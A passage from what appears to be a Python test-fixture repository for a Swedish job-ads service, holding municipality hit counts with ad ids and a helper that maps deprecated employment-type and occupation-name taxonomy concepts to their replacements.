'ad_ids': ['24650556', '24621112', '24617389', '24576031', '24476169']},
{'id': 'EK6X_wZq_CQ8', 'name': 'Älmhult', 'type': 'municipality', 'code': '0765', 'region_code': '07',
'region_name': 'Kronobergs län', 'hits': 11,
'ad_ids': ['24649769', '24649654', '24641236', '24641229', '24638136', '24632509', '24631497', '24625110',
'24617479', '24614602']},
{'id': 'ZhVf_yL5_Q5g', 'name': 'Markaryd', 'type': 'municipality', 'code': '0767', 'region_code': '07',
'region_name': 'Kronobergs län', 'hits': 10,
'ad_ids': ['24629043', '24643980', '24643878', '24639757', '24637755', '24627553', '24618793', '24583008',
'24553167', '24470454']},
{'id': 'mmot_H3A_auW', 'name': 'Växjö', 'type': 'municipality', 'code': '0780', 'region_code': '07',
'region_name': 'Kronobergs län', 'hits': 68,
'ad_ids': ['24649803', '24649739', '24649728', '24647829', '24647003', '24644326', '24644173', '24643867',
'24643342', '24641504']},
{'id': 'GzKo_S48_QCm', 'name': 'Ljungby', 'type': 'municipality', 'code': '0781', 'region_code': '07',
'region_name': 'Kronobergs län', 'hits': 11,
'ad_ids': ['24648839', '24648771', '24645854', '24643124', '24637014', '24636725', '24635767', '24633273',
'24624230', '24622854']},
{'id': 'WPDh_pMr_RLZ', 'name': 'Högsby', 'type': 'municipality', 'code': '0821', 'region_code': '08',
'region_name': 'Kalmar län', 'hits': 2, 'ad_ids': ['24640369', '24636070']},
{'id': 'wYFb_q7w_Nnh', 'name': 'Torsås', 'type': 'municipality', 'code': '0834', 'region_code': '08',
'region_name': 'Kalmar län', 'hits': 4, 'ad_ids': ['24620345', '24621317', '24604125', '24566576']},
{'id': 'Muim_EAi_EFp', 'name': 'Mörbylånga', 'type': 'municipality', 'code': '0840', 'region_code': '08',
'region_name': 'Kalmar län', 'hits': 9,
'ad_ids': ['24638175', '24629762', '24627653', '24611449', '24607639', '24594093', '24572030', '24546217',
'24488349']},
{'id': 'AEQD_1RT_vM9', 'name': 'Hultsfred', 'type': 'municipality', 'code': '0860', 'region_code': '08',
'region_name': 'Kalmar län', 'hits': 9,
'ad_ids': ['24648249', '24644661', '24636959', '24627269', '24627176', '24620579', '24588831', '24527019',
'24510303']},
{'id': '8eEp_iz4_cNN', 'name': 'Mönsterås', 'type': 'municipality', 'code': '0861', 'region_code': '08',
'region_name': 'Kalmar län', 'hits': 5, 'ad_ids': ['24648226', '24625464', '24618320', '24583746', '24573755']},
{'id': '1koj_6Bg_8K6', 'name': 'Emmaboda', 'type': 'municipality', 'code': '0862', 'region_code': '08',
'region_name': 'Kalmar län', 'hits': 2, 'ad_ids': ['24635771', '24615839']},
{'id': 'Pnmg_SgP_uHQ', 'name': 'Kalmar', 'type': 'municipality', 'code': '0880', 'region_code': '08',
'region_name': 'Kalmar län', 'hits': 52,
'ad_ids': ['24649776', '24649356', '24648115', '24647817', '24647756', '24643992', '24643651', '24641992',
'24641371', '24613487']},
{'id': 'xk68_bJa_6Fh', 'name': 'Nybro', 'type': 'municipality', 'code': '0881', 'region_code': '08',
'region_name': 'Kalmar län', 'hits': 6,
'ad_ids': ['24649149', '24638088', '24631517', '24625340', '24621795', '24612228']},
{'id': 'tUP8_hRE_NcF', 'name': 'Oskarshamn', 'type': 'municipality', 'code': '0882', 'region_code': '08',
'region_name': 'Kalmar län', 'hits': 14,
'ad_ids': ['24648664', '24648628', '24646920', '24645350', '24640633', '24635629', '24630203', '24628734',
'24624215', '24617181']},
{'id': 't7H4_S2P_3Fw', 'name': 'Västervik', 'type': 'municipality', 'code': '0883', 'region_code': '08',
'region_name': 'Kalmar län', 'hits': 18,
'ad_ids': ['24647144', '24641319', '24634992', '24632176', '24628636', '24618501', '24617706', '24614479',
'24608624', '24603700']},
{'id': 'a7hJ_zwv_2FR', 'name': 'Vimmerby', 'type': 'municipality', 'code': '0884', 'region_code': '08',
'region_name': 'Kalmar län', 'hits': 15,
'ad_ids': ['24642646', '24642469', '24634998', '24632703', '24628660', '24619779', '24619775', '24614093',
'24593900', '24590275']},
{'id': 'LY9i_qNL_kXf', 'name': 'Borgholm', 'type': 'municipality', 'code': '0885', 'region_code': '08',
'region_name': 'Kalmar län', 'hits': 4, 'ad_ids': ['24631885', '24600006', '24575680', '24496816']},
{'id': 'Ft9P_E8F_VLJ', 'name': 'Gotland', 'type': 'municipality', 'code': '0980', 'region_code': '09',
'region_name': 'Gotlands län', 'hits': 32,
'ad_ids': ['24649062', '24646081', '24645577', '24643883', '24641060', '24637605', '24637052', '24636730',
'24631180', '24631256']},
{'id': '3XMe_nGt_RcU', 'name': 'Hylte', 'type': 'municipality', 'code': '1315', 'region_code': '13',
'region_name': 'Hallands län', 'hits': 7,
'ad_ids': ['24647998', '24646997', '24645469', '24640710', '24633518', '24629087', '24575788']},
{'id': 'kUQB_KdK_kAh', 'name': 'Halmstad', 'type': 'municipality', 'code': '1380', 'region_code': '13',
'region_name': 'Hallands län', 'hits': 48,
'ad_ids': ['24650491', '24649086', '24648647', '24647496', '24646397', '24646379', '24645317', '24644390',
'24643943', '24643937']},
{'id': 'c1iL_rqh_Zja', 'name': 'Laholm', 'type': 'municipality', 'code': '1381', 'region_code': '13',
'region_name': 'Hallands län', 'hits': 7,
'ad_ids': ['24637743', '24624670', '24624583', '24615475', '24614113', '24588536', '24552904']},
{'id': 'qaJg_wMR_C8T', 'name': 'Falkenberg', 'type': 'municipality', 'code': '1382', 'region_code': '13',
'region_name': 'Hallands län', 'hits': 26,
'ad_ids': ['24650289', '24646671', '24644450', '24644424', '24638795', '24638078', '24635865', '24635663',
'24630122', '24612894']},
{'id': 'AkUx_yAq_kGr', 'name': 'Varberg', 'type': 'municipality', 'code': '1383', 'region_code': '13',
'region_name': 'Hallands län', 'hits': 34,
'ad_ids': ['24650646', '24648999', '24648048', '24647269', '24647256', '24646756', '24646453', '24646370',
'24646335', '24646315']},
{'id': '3JKV_KSK_x6z', 'name': 'Kungsbacka', 'type': 'municipality', 'code': '1384', 'region_code': '13',
'region_name': 'Hallands län', 'hits': 16,
'ad_ids': ['24650147', '24650006', '24640093', '24638112', '24635197', '24632626', '24630508', '24624655',
'24622514', '24607841']},
{'id': 'dzWW_R3G_6Eh', 'name': 'Härryda', 'type': 'municipality', 'code': '1401', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 7,
'ad_ids': ['24631009', '24621857', '24606754', '24587980', '24587111', '24568233', '24531121']},
{'id': 'CCiR_sXa_BVW', 'name': 'Partille', 'type': 'municipality', 'code': '1402', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 9,
'ad_ids': ['24644886', '24643254', '24642579', '24642082', '24623735', '24612128', '24611787', '24502309',
'24468685']},
{'id': 'Zjiv_rhk_oJK', 'name': 'Öckerö', 'type': 'municipality', 'code': '1407', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 2, 'ad_ids': ['24616589', '24601739']},
{'id': 'wHrG_FBH_hoD', 'name': 'Stenungsund', 'type': 'municipality', 'code': '1415', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 5,
'ad_ids': ['24635632', '24628237', '24612130', '24606880', '24587131']},
{'id': 'TbL3_HmF_gnx', 'name': 'Tjörn', 'type': 'municipality', 'code': '1419', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 2, 'ad_ids': ['24594903', '24590040']},
{'id': 'tmAp_ykH_N6k', 'name': 'Orust', 'type': 'municipality', 'code': '1421', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 5,
'ad_ids': ['24642072', '24596275', '24586295', '24541260', '24519447']},
{'id': 'aKkp_sEX_cVM', 'name': 'Sotenäs', 'type': 'municipality', 'code': '1427', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 6,
'ad_ids': ['24612938', '24564119', '24535667', '24520889', '24500709', '24485653']},
{'id': '96Dh_3sQ_RFb', 'name': 'Munkedal', 'type': 'municipality', 'code': '1430', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 3, 'ad_ids': ['24641856', '24624344', '24595408']},
{'id': 'qffn_qY4_DLk', 'name': 'Tanum', 'type': 'municipality', 'code': '1435', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 8,
'ad_ids': ['24627761', '24623563', '24623580', '24621916', '24610846', '24608306', '24607156', '24600587']},
{'id': 'NMc9_oEm_yxy', 'name': 'Dals-Ed', 'type': 'municipality', 'code': '1438', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 0, 'ad_ids': []},
{'id': 'kCHb_icw_W5E', 'name': 'Färgelanda', 'type': 'municipality', 'code': '1439', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 2, 'ad_ids': ['24639807', '24556773']},
{'id': '17Ug_Btv_mBr', 'name': 'Ale', 'type': 'municipality', 'code': '1440', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 3, 'ad_ids': ['24636146', '24628807', '24616322']},
{'id': 'yHV7_2Y6_zQx', 'name': 'Lerum', 'type': 'municipality', 'code': '1441', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 4, 'ad_ids': ['24650394', '24620026', '24603503', '24588967']},
{'id': 'NfFx_5jj_ogg', 'name': 'Vårgårda', 'type': 'municipality', 'code': '1442', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 5,
'ad_ids': ['24648984', '24648901', '24613448', '24595489', '24497926']},
{'id': 'ypAQ_vTD_KLU', 'name': 'Bollebygd', 'type': 'municipality', 'code': '1443', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 1, 'ad_ids': ['24576508']},
{'id': 'ZNZy_Hh5_gSW', 'name': 'Grästorp', 'type': 'municipality', 'code': '1444', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 0, 'ad_ids': []},
{'id': 'ZzEA_2Fg_Pt2', 'name': 'Essunga', 'type': 'municipality', 'code': '1445', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 2, 'ad_ids': ['24626743', '24523562']},
{'id': 'e413_94L_hdh', 'name': 'Karlsborg', 'type': 'municipality', 'code': '1446', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 0, 'ad_ids': []},
{'id': 'roiB_uVV_4Cj', 'name': 'Gullspång', 'type': 'municipality', 'code': '1447', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 1, 'ad_ids': ['24643272']},
{'id': 'SEje_LdC_9qN', 'name': 'Tranemo', 'type': 'municipality', 'code': '1452', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 6,
'ad_ids': ['24645375', '24615877', '24608246', '24595425', '24595398', '24589648']},
{'id': 'hejM_Jct_XJk', 'name': 'Bengtsfors', 'type': 'municipality', 'code': '1460', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 5,
'ad_ids': ['24628976', '24627769', '24606787', '24606679', '24606575']},
{'id': 'tt1B_7rH_vhG', 'name': 'Mellerud', 'type': 'municipality', 'code': '1461', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 4, 'ad_ids': ['24644889', '24638627', '24615086', '24614249']},
{'id': 'YQcE_SNB_Tv3', 'name': 'Lilla Edet', 'type': 'municipality', 'code': '1462', 'region_code': '14',
 'region_name': 'Västra Götalands län', 'hits': 4, 'ad_ids': ['24642553', '24632874', '24622421', '24610751']},
{'id': '7HAb_9or_eFM', 'name': 'Mark', 'type': 'municipality', 'code': '1463', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 14,
'ad_ids': ['24648862', '24646848', '24646268', '24641228', '24630473', '24636557', '24636719', '24634116',
'24622756', '24605393']},
{'id': 'rZWC_pXf_ySZ', 'name': 'Svenljunga', 'type': 'municipality', 'code': '1465', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 6,
'ad_ids': ['24643128', '24623466', '24623505', '24615913', '24601846', '24557637']},
{'id': 'J116_VFs_cg6', 'name': 'Herrljunga', 'type': 'municipality', 'code': '1466', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 6,
'ad_ids': ['24641573', '24636142', '24617273', '24602256', '24589027', '24344092']},
{'id': 'fbHM_yhA_BqS', 'name': 'Vara', 'type': 'municipality', 'code': '1470', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 9,
'ad_ids': ['24629592', '24623071', '24600787', '24581780', '24573835', '24573476', '24564712', '24560074',
'24550766']},
{'id': 'txzq_PQY_FGi', 'name': 'Götene', 'type': 'municipality', 'code': '1471', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 4, 'ad_ids': ['24640957', '24645273', '24482625', '24435186']},
{'id': 'aLFZ_NHw_atB', 'name': 'Tibro', 'type': 'municipality', 'code': '1472', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 8,
'ad_ids': ['24645712', '24644627', '24629456', '24602786', '24606277', '24573354', '24571196', '24529612']},
{'id': 'a15F_gAH_pn6', 'name': 'Töreboda', 'type': 'municipality', 'code': '1473', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 4, 'ad_ids': ['24627789', '24606276', '24602447', '24522711']},
{'id': 'PVZL_BQT_XtL', 'name': 'Göteborg', 'type': 'municipality', 'code': '1480', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 366,
'ad_ids': ['24681247', '24676773', '24650996', '24650965', '24650945', '24650584', '24650192', '24649925',
'24649915', '24649703']},
{'id': 'mc45_ki9_Bv3', 'name': 'Mölndal', 'type': 'municipality', 'code': '1481', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 34,
'ad_ids': ['24650280', '24647664', '24645598', '24645052', '24644887', '24642987', '24642642', '24641578',
'24635304', '24632723']},
{'id': 'ZkZf_HbK_Mcr', 'name': 'Kungälv', 'type': 'municipality', 'code': '1482', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 10,
'ad_ids': ['24649688', '24636513', '24631373', '24599794', '24597606', '24594445', '24587159', '24487095',
'24361598', '24329253']},
{'id': 'z2cX_rjC_zFo', 'name': 'Lysekil', 'type': 'municipality', 'code': '1484', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 5,
'ad_ids': ['24635267', '24618391', '24605089', '24566449', '24554224']},
{'id': 'xQc2_SzA_rHK', 'name': 'Uddevalla', 'type': 'municipality', 'code': '1485', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 19,
'ad_ids': ['24649569', '24648333', '24641531', '24640747', '24639878', '24635023', '24633830', '24627768',
'24624785', '24619542']},
{'id': 'PAxT_FLT_3Kq', 'name': 'Strömstad', 'type': 'municipality', 'code': '1486', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 3, 'ad_ids': ['24645683', '24640280', '24612600']},
{'id': 'THif_q6H_MjG', 'name': 'Vänersborg', 'type': 'municipality', 'code': '1487', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 12,
'ad_ids': ['24643619', '24641986', '24626856', '24624150', '24615861', '24615817', '24615329', '24592505',
'24598715', '24598400']},
{'id': 'CSy8_41F_YvX', 'name': 'Trollhättan', 'type': 'municipality', 'code': '1488', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 21,
'ad_ids': ['24646037', '24639347', '24627262', '24624949', '24615219', '24615218', '24609960', '24607976',
'24606466', '24604829']},
{'id': 'UQ75_1eU_jaC', 'name': 'Alingsås', 'type': 'municipality', 'code': '1489', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 19,
'ad_ids': ['24641757', '24632495', '24631417', '24629793', '24626567', '24624598', '24618097', '24615747',
'24607775', '24607729']},
{'id': 'TpRZ_bFL_jhL', 'name': 'Borås', 'type': 'municipality', 'code': '1490', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 74,
'ad_ids': ['24674944', '24649696', '24649621', '24647020', '24641526', '24645912', '24644338', '24643016',
'24641652', '24641101']},
{'id': 'an4a_8t2_Zpd', 'name': 'Ulricehamn', 'type': 'municipality', 'code': '1491', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 5,
'ad_ids': ['24650721', '24645207', '24643748', '24639136', '24570351']},
{'id': 'M1UC_Cnf_r7g', 'name': 'Åmål', 'type': 'municipality', 'code': '1492', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 5,
'ad_ids': ['24633826', '24629622', '24627722', '24593424', '24541403']},
{'id': 'Lzpu_thX_Wpa', 'name': 'Mariestad', 'type': 'municipality', 'code': '1493', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 3, 'ad_ids': ['24646647', '24607084', '24606384']},
{'id': 'FN1Y_asc_D8y', 'name': 'Lidköping', 'type': 'municipality', 'code': '1494', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 9,
'ad_ids': ['24641522', '24624546', '24624090', '24606663', '24606030', '24586133', '24585588', '24516242',
'24417820']},
{'id': 'k1SK_gxg_dW4', 'name': 'Skara', 'type': 'municipality', 'code': '1495', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 13,
'ad_ids': ['24644221', '24639811', '24639532', '24631244', '24616809', '24614229', '24606824', '24600741',
'24595277', '24552003']},
{'id': 'fqAy_4ji_Lz2', 'name': 'Skövde', 'type': 'municipality', 'code': '1496', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 31,
'ad_ids': ['24649472', '24645228', '24642392', '24642391', '24638912', '24636831', '24636136', '24635424',
'24633671', '24628305']},
{'id': 'YbFS_34r_K2v', 'name': 'Hjo', 'type': 'municipality', 'code': '1497', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 5,
'ad_ids': ['24624908', '24585725', '24583812', '24573430', '24483113']},
{'id': 'Zsf5_vpP_Bs4', 'name': 'Tidaholm', 'type': 'municipality', 'code': '1498', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 2, 'ad_ids': ['24617483', '24600800']},
{'id': 'ZySF_gif_zE4', 'name': 'Falköping', 'type': 'municipality', 'code': '1499', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 8,
'ad_ids': ['24650374', '24640803', '24636373', '24635597', '24630448', '24628992', '24620333', '24617776']},
]
```
#### File: concept_ids/taxonomy_replace/taxonomy_replaced_by_response_by_type.py
```python
def get_old_replaced_by_and_label_from_taxonomy_data(taxonomy_data):
    """Flatten taxonomy 'replaced-by' responses into {'old', 'replaced_by', 'label'} dicts.

    Each entry maps a deprecated concept id to the id and preferred label of the
    concept that replaces it (only the first replacement entry is used).
    """
    tmp_list = []
    for item in taxonomy_data:
        concept = item['taxonomy/concept']
        replaced_by = concept['taxonomy/replaced-by'][0]  # first (and typically only) replacement
        tmp_list.append({'old': concept['taxonomy/id'],
                         'replaced_by': replaced_by['taxonomy/id'],
                         'label': replaced_by['taxonomy/preferred-label'],
                         })
    return tmp_list
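
# A minimal usage sketch (added for illustration, not part of the original module):
# running the helper over one of the change lists defined below, e.g.
#
#     get_old_replaced_by_and_label_from_taxonomy_data(change_v1_to_v2_employment_type)
#
# yields flattened mappings such as
#
#     {'old': 'PFZr_Syz_cUq', 'replaced_by': 'kpPX_CNN_gDU',
#      'label': 'Tillsvidareanställning (inkl. eventuell provanställning)'}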
change_v1_to_v2_employment_type = [
{'taxonomy/concept': {'taxonomy/id': 'PFZr_Syz_cUq', 'taxonomy/type': 'employment-type',
'taxonomy/definition': 'Vanlig anställning', 'taxonomy/preferred-label': 'Vanlig anställning',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [{'taxonomy/id': 'kpPX_CNN_gDU',
'taxonomy/definition': 'En tillsvidareanställning fortsätter tills du själv vill sluta, blir uppsagd eller går i pension. Det finns inte något tidsbestämt datum när anställningen upphör. När du får ett nytt jobb kan det börja med att du får en provanställning. Det innebär att både du och din arbetsgivare har en prövotid på högst sex månader för att se om du passar för jobbet. Om arbetsgivaren är nöjd och om du själv vill fortsätta övergår provanställningen sedan automatiskt till en tillsvidareanställning.',
'taxonomy/type': 'employment-type',
'taxonomy/preferred-label': 'Tillsvidareanställning (inkl. eventuell provanställning)'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'Jh8f_q9J_pbJ', 'taxonomy/type': 'employment-type',
'taxonomy/definition': 'Sommarjobb / feriejobb',
'taxonomy/preferred-label': 'Sommarjobb / feriejobb', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [{'taxonomy/id': 'EBhX_Qm2_8eX',
'taxonomy/definition': 'En säsongsanställning är tidsbegränsad till en viss del av året. Det kan till exempel vara att jobba på en campingplats på sommaren eller en skidort på vintern. ',
'taxonomy/type': 'employment-type',
'taxonomy/preferred-label': 'Säsongsanställning'}]},
'taxonomy/version': 2}]
change_v1_to_v2_occupation_name = [
{'taxonomy/concept': {'taxonomy/id': 'Jx4V_6tm_fUH', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Projekteringsingenjör, elkraft',
'taxonomy/preferred-label': 'Projekteringsingenjör, elkraft', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'YcvM_Gqk_6U7', 'taxonomy/definition': 'Utvecklingsingenjör, elkraft',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Utvecklingsingenjör, elkraft'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'P2bU_f8o_Lkw', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Processingenjör, elkraft',
'taxonomy/preferred-label': 'Processingenjör, elkraft', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'FuJx_cGT_5im', 'taxonomy/definition': 'Civilingenjör, elkraft',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Civilingenjör, elkraft'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'v5nC_xX1_Y7U', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Standardiseringsingenjör, elkraft',
'taxonomy/preferred-label': 'Standardiseringsingenjör, elkraft', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'FuJx_cGT_5im', 'taxonomy/definition': 'Civilingenjör, elkraft',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Civilingenjör, elkraft'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'VCsj_Uve_6EJ', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Köksföreståndare', 'taxonomy/preferred-label': 'Köksföreståndare',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [{'taxonomy/id': 'ATAp_LN5_BPU',
'taxonomy/definition': 'Ekonomiföreståndare/Kursgårdsföreståndare/Storhushållsföreståndare',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Ekonomiföreståndare/Kursgårdsföreståndare/Storhushållsföreståndare'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'sqJi_voF_eaR', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Storhushållsföreståndare',
'taxonomy/preferred-label': 'Storhushållsföreståndare', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [{'taxonomy/id': 'ATAp_LN5_BPU',
'taxonomy/definition': 'Ekonomiföreståndare/Kursgårdsföreståndare/Storhushållsföreståndare',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Ekonomiföreståndare/Kursgårdsföreståndare/Storhushållsföreståndare'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'aCbh_uAN_6th', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Kursgårdsföreståndare',
'taxonomy/preferred-label': 'Kursgårdsföreståndare', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [{'taxonomy/id': 'ATAp_LN5_BPU',
'taxonomy/definition': 'Ekonomiföreståndare/Kursgårdsföreståndare/Storhushållsföreståndare',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Ekonomiföreståndare/Kursgårdsföreståndare/Storhushållsföreståndare'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'Yx7u_AbE_Jqk', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Hotellhusfru', 'taxonomy/preferred-label': 'Hotellhusfru',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'cYP6_Tur_q6m', 'taxonomy/definition': 'Arbetsledare, städ/Husfru/Städledare',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Arbetsledare, städ/Husfru/Städledare'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'JKDm_nyA_8bK', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Plastmontör', 'taxonomy/preferred-label': 'Plastmontör',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'efyx_6es_7jQ', 'taxonomy/definition': 'Montör, gummi- och plastprodukter',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Montör, gummi- och plastprodukter'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'D3M6_p8P_jdD', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Forskningsingenjör, elkraft',
'taxonomy/preferred-label': 'Forskningsingenjör, elkraft', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'FuJx_cGT_5im', 'taxonomy/definition': 'Civilingenjör, elkraft',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Civilingenjör, elkraft'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'gE2Y_BMR_Dpq', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Simhallsföreståndare',
'taxonomy/preferred-label': 'Simhallsföreståndare', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [{'taxonomy/id': 'q6mQ_fnc_A9Y',
'taxonomy/definition': 'Badföreståndare/Simhallsföreståndare',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Badföreståndare/Simhallsföreståndare'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'RhoN_Vdo_F5H', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Källarmästare', 'taxonomy/preferred-label': 'Källarmästare',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'Bfn9_6FK_iaY', 'taxonomy/definition': 'F&B Manager/Food and beverage manager',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'F&B Manager/Food and beverage manager'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'FoCc_qZ4_Yi8', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Personlig handläggare, försäkringskassa',
'taxonomy/preferred-label': 'Personlig handläggare, försäkringskassa',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': '2AGe_heZ_E94', 'taxonomy/definition': 'Försäkringshandläggare, försäkringskassa',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Försäkringshandläggare, försäkringskassa'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'fo9m_5cC_y8G', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Internrevisor', 'taxonomy/preferred-label': 'Internrevisor',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'jwgi_jYc_iE9', 'taxonomy/definition': 'Revisor', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Revisor'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'D7tB_NxQ_ZWN', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Befolkningsstatistiker',
'taxonomy/preferred-label': 'Befolkningsstatistiker', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [{'taxonomy/id': 'GX5o_8RD_rxJ', 'taxonomy/definition': 'Demograf',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Demograf'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'KgMS_ENm_V7z', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Vårdnadsutredare', 'taxonomy/preferred-label': 'Vårdnadsutredare',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'dBVw_5Cw_upG', 'taxonomy/definition': 'Familjerättssekreterare',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Familjerättssekreterare'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'cUKA_xwQ_VWk', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Försäkringsaktuarie',
'taxonomy/preferred-label': 'Försäkringsaktuarie', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [{'taxonomy/id': 's9UN_r5w_c5K',
'taxonomy/definition': 'Aktuarie/Försäkringsaktuarie/Försäkringsmatematiker',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Aktuarie/Försäkringsaktuarie/Försäkringsmatematiker'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'AJSy_PSb_tLY', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Försäkringsmatematiker',
'taxonomy/preferred-label': 'Försäkringsmatematiker', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [{'taxonomy/id': 's9UN_r5w_c5K',
'taxonomy/definition': 'Aktuarie/Försäkringsaktuarie/Försäkringsmatematiker',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Aktuarie/Försäkringsaktuarie/Försäkringsmatematiker'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'e885_ehx_zxp', 'taxonomy/type': 'occupation-name',
